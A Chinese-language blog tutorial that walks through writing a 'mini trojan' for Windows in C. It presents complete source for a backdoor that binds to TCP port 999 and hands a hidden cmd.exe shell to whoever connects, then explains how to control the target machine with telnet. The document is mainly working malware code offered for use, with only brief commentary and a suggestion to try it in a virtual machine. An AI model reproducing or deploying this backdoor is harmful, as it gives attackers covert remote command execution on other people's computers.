MINI木马的编写
编写一个服务端,服务端开启远程后门
客户端使用telnet命令来操控该木马
先进行服务段的编写
WSADATA wsaData;
SOCKET ServiceSocket,ClientSocket;
SOCKADDR_IN SockAddr;
int SockAddrSize;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
SockAddr.sin_port = htons(MasterPort);
ServiceSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0);
bind(ServiceSocket, (SOCKADDR*)&SockAddr, sizeof(SockAddr));
listen(ServiceSocket, 1);
SockAddrSize = sizeof(SockAddr);
ClientSocket = accept(ServiceSocket, (SOCKADDR*)&SockAddr, &SockAddrSize);
先来编写网络通信,使用的是流套接字,也就是TCP网络编程
定义相关变量,初始化widows套接字,然后定义SOCKADDR_IN的相关变量,创建服务端的套接字,将套接字与IP进行绑定,然后进行监听等待客户端进行同意。
接下来就是创建一个进程,用来从目的机中获取我们需要的信息
//创建一个进程
PROCESS_INFORMATION ProcessInfo; //进程信息
STARTUPINFO StartupInfo; //启动信息
char szCMDPath[255];
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
//从环境变量中获取路径
GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow =SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)ClientSocket;//将命令窗口与套接字连接起来,将套接字作为命令窗口的标准输入
StartupInfo.hStdOutput = (HANDLE)ClientSocket;
StartupInfo.hStdError = (HANDLE)ClientSocket;
//创建一个新的进程
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE,0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
先是进行变量的定义,将相关变量清零,获取一条路径,就是存在cmd.exe可执行程序的路径,定义启动信息中的内容,可以参考下面这条博客,了解STARTUPINFO结构体中的内容
https://blog.csdn.net/whynottrythis/article/details/39828395
然后创建新的进程,WaitForSingleObject是等待上面的进程结束以后继续运行上面的进程,关闭进程,关闭线程。
#pragma comment(lib,"ws2_32.lib")
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include<stdio.h>
#include<stdlib.h>
//#include<Windows.h>
#include<WinSock2.h>
#define MasterPort 999
void main()
{
WSADATA wsaData;
SOCKET ServiceSocket,ClientSocket;
SOCKADDR_IN SockAddr;
int SockAddrSize;
//创建一个进程
PROCESS_INFORMATION ProcessInfo; //进程信息
STARTUPINFO StartupInfo; //启动信息
char szCMDPath[255];
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
//从环境变量中获取路径
GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
//printf("%s\n", szCMDPath);
WSAStartup(MAKEWORD(2, 2), &wsaData);
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
SockAddr.sin_port = htons(MasterPort);
ServiceSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0);
bind(ServiceSocket, (SOCKADDR*)&SockAddr, sizeof(SockAddr));
listen(ServiceSocket, 1);
SockAddrSize = sizeof(SockAddr);
ClientSocket = accept(ServiceSocket, (SOCKADDR*)&SockAddr, &SockAddrSize);
// //send(ServiceSocket, "Hello! \n", sizeof("Hello!"), 0);
// //printf("Send OK! \n");
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow =SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)ClientSocket;//将命令窗口与套接字连接起来,将套接字作为命令窗口的标准输入
StartupInfo.hStdOutput = (HANDLE)ClientSocket;
StartupInfo.hStdError = (HANDLE)ClientSocket;
//创建一个新的进程
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE,0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
closesocket(ServiceSocket);
closesocket(ClientSocket);
WSACleanup();
system("pause");
//return 0;
}
完整代码,创建完成后可以在虚拟机中进行测试,但是应为本身比较简单,需要自己启动,启动以后就可以在本机中使用telnet+目的机IP+999进行控制了,使用windows命令行来控制,需要自己去了解windows命令行中的命令。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
